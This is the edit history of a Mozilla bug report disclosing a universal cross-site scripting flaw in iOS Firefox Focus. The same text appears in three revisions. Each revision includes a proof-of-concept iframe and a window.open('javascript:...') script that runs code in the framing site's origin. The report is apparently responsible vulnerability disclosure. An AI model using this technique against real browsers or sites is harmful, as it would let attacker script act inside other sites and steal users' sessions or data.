Bug 1855030 Comment 0 Edit History

Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.

We are able to achieve UXSS on iOS Firefox Focus with window.open().

document.write shows we are escalating to legitimate top origin site.

PoC demo

Legitimate Top Origin Site: https://qrcodescanerror.000webhost.com/UXSS.php

<iframe src="https://pwning.click/uxsstester.php"/></iframe>

Cross-Origin Malicious Evil Site: https://pwning.click/uxsstester.php

<script>
function a(){
	window.open('javascript:document.write(document.domain)', 'x');
	setTimeout(function(){
		window.open('');
	}, 500000);
}
</script> 
<center><input type="button" class="button" value="Trigger UXSS!" onclick="a()"></center>
We are able to achieve UXSS on iOS Firefox Focus with window.open().

document.write shows we are escalating to legitimate top origin site.

PoC demo

Legitimate Top Origin Site: https://qrcodescanerror.000webhost.com/UXSS.php

<iframe src="https://pwning.click/uxsstester.php"/></iframe>

Cross-Origin Malicious Evil Site: https://pwning.click/uxsstester.php
```HTML
<script>
function a(){
	window.open('javascript:document.write(document.domain)', 'x');
	setTimeout(function(){
		window.open('');
	}, 500000);
}
</script> 
<center><input type="button" class="button" value="Trigger UXSS!" onclick="a()"></center>
```
We are able to achieve UXSS on iOS Firefox Focus with window.open().

document.write shows we are escalating to legitimate top origin site.

PoC demo

Legitimate Top Origin Site: https://qrcodescanerror.000webhost.com/UXSS.php
```HTML
<iframe src="https://pwning.click/uxsstester.php"/></iframe>
```
Cross-Origin Malicious Evil Site: https://pwning.click/uxsstester.php
```HTML
<script>
function a(){
	window.open('javascript:document.write(document.domain)', 'x');
	setTimeout(function(){
		window.open('');
	}, 500000);
}
</script> 
<center><input type="button" class="button" value="Trigger UXSS!" onclick="a()"></center>
```

Back to Bug 1855030 Comment 0